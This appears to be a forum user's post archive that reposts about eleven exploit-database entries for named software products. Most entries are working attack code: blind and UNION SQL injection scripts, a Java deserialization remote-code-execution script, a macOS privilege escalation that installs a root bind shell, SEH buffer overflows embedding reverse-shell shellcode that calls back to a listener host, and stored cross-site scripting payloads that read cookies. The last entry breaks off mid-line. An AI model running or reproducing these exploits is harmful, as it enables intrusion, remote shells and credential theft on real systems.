
Everything posted by HireHackking
-
Phase Botnet - Blind SQL Injection
import requests import time import sys wait_delay = 5 #Depending on connection delay and server speed, you may need to make this a larger number KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a' #lol no integrity verification PostData = "" def rc4_crypt(data , key): S = list(range(256)) j = 0 out = [] for i in range(256): j = (j + S[i] + ord( key[i % len(key)] )) % 256 S[i] , S[j] = S[j] , S[i] i = j = 0 for char in data: i = ( i + 1 ) % 256 j = ( j + S[i] ) % 256 S[i] , S[j] = S[j] , S[i] out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256])) return ''.join(out) def brute_length(url, id): for i in range(0, 30): Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay) ConnectUrl = url + '?i=' + Injection start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): return i return 0 def brute_char(url, position, id): sys.stdout.write(" ") sys.stdout.flush() for i in range(32, 127): Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay) ConnectUrl = url + '?i=' + Injection sys.stdout.write("\b%c" % chr(i)) sys.stdout.flush() start = time.time() r = requests.post(ConnectUrl, data=PostData, headers='') end = time.time() if((end - start) >= wait_delay): break def brute_panel(url): global KnockString, PostData PostData = 'aaaa' + rc4_crypt(KnockString, 'aaaa') print"Username: ",; sys.stdout.flush() ulen = brute_length(url, 1) for i in range(1, ulen+1): brute_char(url, i, 1) print"\nPassword: ", sys.stdout.flush() plen = brute_length(url, 2) for i in range(1, plen+1): brute_char(url, i, 2) print"" if(len(sys.argv) >= 2): brute_panel(sys.argv[1]) else: print("enter panel gate url")
-
Orchard Core RC1 - Persistent Cross-Site Scripting
# Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting # Google Dork: "Orchardcms" # Date: 2020-05-07 # Exploit Author: SunCSR (Sun* Cyber Security Research) # Vendor Homepage: http://www.orchardcore.net/ # Software Link: https://github.com/OrchardCMS/OrchardCore # Version: RC1 # Tested on: Windows # CVE : N/A ### Vulnerability : Persistent Cross-Site Scripting ### Describe the bug Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML when creating or editing blog content. ### To Reproduce Steps to reproduce the behavior: POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1 -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="ListPart.ContainerId" 4s5x3fv3qpsh7rwzvy069ykbxn -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="TitlePart.Title" Test XSS -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="AutoroutePart.Path" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="BlogPost.Subtitle.Text" -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="MarkdownBodyPart.Source" <script>alert(document.cookie)</script> -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="submit.Publish" submit.Publish -----------------------------31063090348194141451329743365 Content-Disposition: form-data; name="__RequestVerificationToken" xxx -----------------------------31063090348194141451329743365-- ### Reference: https://github.com/OrchardCMS/OrchardCore/issues/5802 ### History ============= 2020-03-23 Issue discovered 2020-03-27 Vendor contacted 2020-04-22 Vendor response and hotfix 2020-04-22 Vendor set patch milestone to rc2
-
qdPM 9.1 - Arbitrary File Upload
# Exploit Title: qdPM 9.1 - Arbitrary File Upload # Date: 2020-05-06 # Author: Besim ALTINOK # Vendor Homepage: https://sourceforge.net/projects/qdpm/ # Software Link: https://sourceforge.net/projects/qdpm/ # Version: v9.1 (may also affect other versions) # Tested on: Xampp # Credit: İsmail BOZKURT # Remotely: Yes Description -------------------------------------------------------------------- When a normal user updates their profile, they can upload arbitrary files to the user_photo area, because there is no file-extension check. Additionally, the .htaccess file has some protection against malicious .php files, but the developer wrote the regex incorrectly: the FilesMatch pattern below is case-sensitive, so an upper-case extension is not matched and the attacker can change the extension to (.PHP) and run code on the server. .htaccess file content: ---------------------------------------------- # This is used to restrict access to this folder to anything other # than images # Prevents any script files from being accessed from the images folder <FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$"> Order Deny,Allow Deny from all </FilesMatch> Vulnerable File-1: actions.class.php ---------------------------------------------- Vulnerable function: processForm --------------------------------------------- Vulnerable area: --------------------------------------------- <?php protected function processForm(sfWebRequest $request, sfForm $form) { $files = $request->getFiles(); $userPhoto = $files['users']['photo']['name']; $form->bind($request->getParameter($form->getName()), $request->getFiles($form->getName())); if ($form->isValid()) { $user = $this->getUser()->getAttribute('user'); $this->checkUser($form['email']->getValue(),$user->getId()); $form->setFieldValue('users_group_id',$user->getUsersGroupId()); $form->setFieldValue('active',$user->getActive()); $hasher = new PasswordHash(11, false); if(isset($form['new_password'])) { if(strlen($form['new_password']->getValue())>0) { $form->setFieldValue('password', 
$hasher->HashPassword($form['new_password']->getValue())); } } if(strlen($userPhoto)>0) { $userPhoto = rand(111111,999999) . '-' . $userPhoto; $filename = sfConfig::get('sf_upload_dir') . '/users/' . $userPhoto; move_uploaded_file($files['users']['photo']['tmp_name'], $filename); $form->setFieldValue('photo', $userPhoto); app::image_resize($filename,$filename); } else { $form->setFieldValue('photo', $form['photo_preview']->getValue()); } ?>
-
LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-12 # Vulnerable Software: LanSend 3.2 # Vendor Homepage: https://lizardsystems.com # Version: 3.2 # Software Link: https://lizardsystems.com/download/lansend_setup.exe # Tested on: Windows 7 x86 f = file('payload.txt','w') """ PoC 1. Run exploit 2. Run Lansend and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """ """ msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """ shellcode = b"" shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" shellcode += 
b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" """ 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """ jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' """ppr 00417a47""" payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x47\x7a\x41' f.write(payload) f.close()
-
Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting
# Exploit Title: Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting # Date: 2020-04-16 # Exploit Author: Dylan Garnaud & Benoit Malaboeuf - Pentesters from Orange Cyberdefense France # Vendor Homepage: https://www.cisco.com/c/en/us/products/cloud-systems-management/dna-center/index.html # Version: Cisco DNA before 1.3.0.6 and 1.3.1.4 # Tested on: 1.3.0.2 # CVE : CVE-2019-15253 # Security advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190205-dnac-xss ## 1 - Network Hierarchy - Vulnerable parameter: Floor Name. - Payload: ```<script>alert('XSS')</script>``` - Details: There is no control or security mechanism on this field. Special characters are not encoded or filtered. - Privileges: It requires an admin or customer account. - Location: Design -> Network Hierarchy -> Building -> Floor -> Field: "Floor name" . ## 2 - User Management - Vulnerable parameters: First Name, Last Name . - Payload: ```<script>alert('XSS')</script>``` - Details: There is no control or security mechanism on these fields. Special characters are not encoded or filtered. - Privileges: It requires an admin account. - Location: Settings -> Users -> User Management -> Fields: "First Name" or "Last Name".
-
MacOS 320.whatis Script - Privilege Escalation
# Exploit Title: MacOS 320.whatis Script - Privilege Escalation # Date: 2020-05-06 # Exploit Author: Csaba Fitzl # Vendor Homepage: https://support.apple.com/en-us/HT210722 # Version: macOS < 10.15.1 # Tested on: macOS # CVE : CVE-2019-8802 import sys import os man_file_content = """ .TH exploit 1 "August 16 2019" "Csaba Fitzl" .SH NAME exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!-- """ sh_quick_content = """ /Applications/Utilities/Terminal.app/Contents/MacOS/Terminal """ sh_reboot_content = """ python /Applications/Scripts/bind.py """ python_bind_content = """ #!/usr/bin/python2 import os import pty import socket lport = 31337 def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', lport)) s.listen(1) (rem, addr) = s.accept() os.dup2(rem.fileno(),0) os.dup2(rem.fileno(),1) os.dup2(rem.fileno(),2) os.putenv("HISTFILE",'/dev/null') pty.spawn("/bin/bash") s.close() if __name__ == "__main__": main() """ def create_man_file(): print("[i] Creating bogus man page: /usr/local/share/man/man1/<!--exploit.1") f = open('/usr/local/share/man/man1/<!--exploit.1','w') f.write(man_file_content) f.close() def create_symlink(): print("[i] Creating symlink in /usr/local/share/man/") os.system('ln -s /Library/LaunchDaemons/com.sample.Load.plist /usr/local/share/man/whatis.tmp') def create_scripts_dir(): print("[i] Creating /Applications/Scripts directory") os.system('mkdir /Applications/Scripts') def create_quick_scripts(): create_scripts_dir() print("[i] Creating script file to be called by LaunchDaemon") f = open('/Applications/Scripts/sample.sh','w') f.write(sh_quick_content) f.close() os.system('chmod +x 
/Applications/Scripts/sample.sh') def create_reboot_scripts(): create_scripts_dir() print("[i] Creating script file to be called by LaunchDaemon") f = open('/Applications/Scripts/sample.sh','w') f.write(sh_reboot_content) f.close() os.system('chmod +x /Applications/Scripts/sample.sh') print("[i] Creating python script for bind shell") f = open('/Applications/Scripts/bind.py','w') f.write(python_bind_content) f.close() def rename_man_pages(): for root, dirs, files in os.walk("/usr/local/share/man"): for file in files: if file[0] in "0123456789": #if filename begins with a number old_file = os.path.join(root, file) new_file = os.path.join(root, 'a' + file) os.rename(old_file, new_file) #rename with adding a prefix print("[i] Renaming: " + os.path.join(root, file)) def main(): if len(sys.argv) != 2 : print "[-] Usage: python makewhatis_exploit.py [quick|reboot]" sys.exit (1) if sys.argv[1] == 'quick': create_man_file() create_symlink() create_quick_scripts() rename_man_pages() print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist" elif sys.argv[1] == 'reboot': create_man_file() create_symlink() create_reboot_scripts() rename_man_pages() print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337" else: print "[-] Invalid arguments" print "[-] Usage: python makewhatis_exploit.py [quick|reboot]" if __name__== "__main__": main()
-
TylerTech Eagle 2018.3.11 - Remote Code Execution
# Exploit Title: TylerTech Eagle 2018.3.11 - Remote Code Execution # Date: 2019-10-08 # Exploit Author: Anthony Cole # Vendor Homepage: https://www.tylertech.com/products/eagle # Version: 2018.3.11 # Tested on: Windows 2012 # CVE: CVE-2019-16112 # Category: webapps # # Eagle is a software written in Java by TylerTech. Version 2018.3.11 allows an unauthenticated attacker to cause the software to deserialize untrusted data that can result in remote code execution. # /recorder/ServiceManager in TylerTech Eagle 2018.3.11 is vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the tomcat service that is running the application. # import sys, requests, zlib, argparse, urlparse, subprocess from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def run_command(command): p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True) output = b'' for line in iter(p.stdout.readline, b''): output += line return output def isurl(urlstr): try: urlparse.urlparse(urlstr) return urlstr except: raise argparse.ArgumentTypeError("invalid url") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Java Deserialization Exlpoit') parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.") parser.add_argument("--cmd", "-c", required=True, help="the command to execute") parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.jar") parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080") args = parser.parse_args() url_parts = urlparse.urlparse(args.url) target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc) proxies = {} if(args.proxy != None): proxy_parts = urlparse.urlparse(args.proxy) proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc) 
cmd = args.cmd serial_payload = run_command('java -jar %s CommonsCollections6 "%s"' % (args.ysoserial, args.cmd)) url = target_url + "/recorder/ServiceManager?service=tyler.empire.settings.SettingManager" headers = {'Content-Type': 'application/octet-stream'} payload = zlib.compress(serial_payload) response = requests.post(url, data=payload, proxies=proxies, verify=False)
-
Complaint Management System 1.0 - 'username' SQL Injection
# Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection # Exploit Author: Daniel Ortiz # Date: 2020-05-12 # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Tested on: XAMPP Version 5.6.40 / Windows 10 # Software Link: https://www.sourcecodester.com/php/14206/complaint-management-system.html #!/usr/bin/python import sys import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning) def main(): target = sys.argv[1] payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#" url = "http://%s/cms/admin/index.php" % target print("[+] Target: %s") % target print("[+] Injecting payload: %s") % payload inject(url, payload) def inject(url, payload): s = requests.Session() d = {'username': payload, 'password': 'admin', 'submit': ''} r = s.post(url, data=d, proxies=proxy) if __name__ == '__main__': if len(sys.argv) != 2: print("(-) usage: %s TARGET" % sys.argv[0]) print("(-) e.g: %s 192.168.0.10" % sys.argv[0]) sys.exit(-1) main()
-
Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting # Exploit Author: gurbanli # Date: 2020-05-13 # Vendor Homepage: https://www.sellacious.com # Version: 4.6 # Software Link: https://www.sellacious.com/free-open-source-ecommerce-software Document Title: =============== Sellacious eCommerce - Multiple Persistent Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2226 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== https://www.sellacious.com/free-open-source-ecommerce-software Vulnerability Disclosure Timeline: ================================== 2020-05-08: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Sellacious eCommerce Shop CMS (2020 Q1). The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The cross site web vulnerabilities are located in all the address input fields of the `Manage Your Addresses` module. Remote attackers are able to register a low privilege user account to inject own malicious script code to the address information page. The execution of the script code occurs each time the address information is used in the web ui of the ecommerce application. The request method to inject is POST and the attack vector is persistent on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. 
Request Method(s): [+] POST Vulnerable Module(s): [+] Manage Your Addresses Vulnerable Input(s): [+] Full name [+] First name [+] Middle name [+] Last name [+] Company [+] PO Box [+] Address [+] Landmark Affected(s): [+] index.php/manage-your-addresses [+] Backend user address information listing Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with a user account and low user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue. PoC: Exploitation <iframe src="evil.source" onload=alert(document.cookie)> <iframe src="evil.source" onload=alert(document.domain)> PoC: Vulnerable Source <div class="addresses-container"> <div class="address-heading"> <h2>Your addresses <a href="#address-form-0" role="button" data-toggle="ctech-modal" class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary"> <i class="fa fa-plus"></i> <span class="add-address-text">Add New Address</span></a></h2></div> <div id="addresses" class="cart-aio ctech-text-center"> <div id="address-editor"> <ul id="address-items" data-original-title="" title=""> <li class="address-item" id="address-item-9"> <div class="ctech-float-right address-action"> <button type="button" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip remove-address" data-placement="bottom" data-id="9" title="" data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a href="#address-form-9" role="button" data-toggle="ctech-modal" data-placement="bottom" class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title="" data-original-title="Edit"><i class="fa fa-edit"></i></a> </div> <div class="address-content"> <span class="address_name">>"<iframe src="evil.source"></span> <span class="address_company">>"<iframe src="evil.source"></span> <span class="address_po_box">PO #: >"<iframe src="evil.source"></span> <span 
class="address_address has-comma">>"<iframe src="evil.source"></span> <span class="address_landmark has-comma">>"<iframe src="evil.source"></span> <span class="address_country">United States</span> <div class="cart_address_box w100p"> <div class="cart_address_buttons"> </div> </div> </div> </li> <li class="address-item odd-address-item"> <a href="#address-form-0" role="button" data-toggle="ctech-modal" class="btn-new-address"><i class="fa fa-plus"></i></a> </li> </iframe></span></div></li></ul> <div class="ctech-wrapper"> </div><div class="ctech-clearfix"></div> </div><div class="ctech-clearfix"></div> </div></div> Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
Tryton 5.4 - Persistent Cross-Site Scripting
# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting # Exploit Author: Vulnerability-Lab # Date: 2020-05-13 # Vendor Homepage: https://www.tryton.org/ # Version: 5.4 # Software Link: https://www.tryton.org/download Document Title: =============== Tryton v5.4 - (Name) Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2233 Common Vulnerability Scoring System: ==================================== 4.4 Product & Service Introduction: =============================== https://www.tryton.org/ & https://www.tryton.org/download Affected Product(s): ==================== Tryton Foundation Product: Tryton v5.4 - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-12: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Tryton v5.4 web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `name` parameter of the `User Profile` module. Remote attackers with low privileges are able to inject own malicious persistent script code as name for user accounts. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. The injection point is the profile input field holding the name value, and execution occurs in the front UI (top right, where the avatar is listed) or in the admin backend on the res.user;name="Users"&views. 
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] User Profile Vulnerable Input(s): [+] Name Vulnerable Parameter(s): [+] name Affected Module(s): [+] /index [+] /model/res.user;name="Users"&views (backend) Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by a low-privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the application and login to your low privileged user account 2. Move to the profile on top right side (click) 3. Inject test payload to the "Name" input field and save the entry 4. Execution occurs after save on top right and /model/res.user;name="Users"&views of the admin backend 5. Successful reproduction of the persistent cross-site vulnerability! 
PoC: Payload %20>"><img%20src="evil.source%20onload=alert(document.cookie)> PoC: Vulnerable Source (Execution Point) <div class="input-group input-group-sm"><span class="input-group-btn"><button type="button" class="btn btn-default">Filters</button></span> <input class="form-control mousetrap" placeholder="Search" autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist> <span class="input-group-btn"><button type="button" class="btn btn-default hidden-md hidden-lg" aria-label="Clear Search" title="Clear Search" style="display: none;"><img class="icon" src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button> <button type="submit" class="btn btn-default" aria-label="Search" title="Search"><img class="icon" src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button class="btn btn-default hidden-xs" type="button" title="Bookmark this filter" aria-label="Bookmark this filter"><img class="icon" aria-hidden="true" src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown" aria-expanded="false" aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled=""> <img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button> <ul class="dropdown-menu dropdown-menu-right" role="menu" aria-labelledby="bookmarks"></ul><button type="button" class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show inactive records" title="Show inactive records"> <img aria-hidden="true" class="icon" src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div> --- PoC Session Logs [POST] --- https://tryton.localhost:8080/tryton/ Host: tryton.localhost:8080 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/json Authorization: Session 
ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM= X-Requested-With: XMLHttpRequest Content-Length: 527 Origin: https://tryton.localhost:8080 Connection: keep-alive Referer: https://tryton.localhost:8080/ {"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">", "signature":"test signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1, "company.rec_name":"Michael Scott Paper Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10], "locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time": {"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]} - POST: HTTP/2.0 200 OK server: nginx/1.16.1 content-type: application/json access-control-allow-origin: https://tryton.localhost:8080 vary: Origin content-encoding: gzip Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM
-
Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH) # Exploit Author: gurbanli # Date: 2020-05-12 # Vulnerable Software: Remote Desktop Audit 2.3.0.157 # Vendor Homepage: https://lizardsystems.com # Version: 2.3.0.157 # Software Link: https://lizardsystems.com/download/rdaudit_setup.exe # Tested on: Windows 7 x86 f = file('payload.txt','w') """ Same with LanSend 3.2, but with different ppr address. PoC 1. Run exploit 2. Run Remote Desktop Audit and Click Add Computers Wizard 3. Choose import computers from file 4. Copy/paste payload.txt content into filename section 5. shellcode will be executed """ """ msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' """ shellcode = b"" shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf" shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17" shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b" shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa" shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89" shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92" shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c" shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1" shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9" shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae" shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01" shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7" shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b" shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59" shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a" shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a" shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6" shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14" shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98" shellcode += 
b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda" shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32" shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc" shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75" shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52" shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b" shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8" shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a" shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b" shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f" shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e" shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c" shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7" """ 047FFF09 59 POP ECX 047FFF0A 59 POP ECX 047FFF0B 80C1 64 ADD CL,64 047FFF0E ^FFE1 JMP ECX """ jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1' """ppr 00418230""" payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + 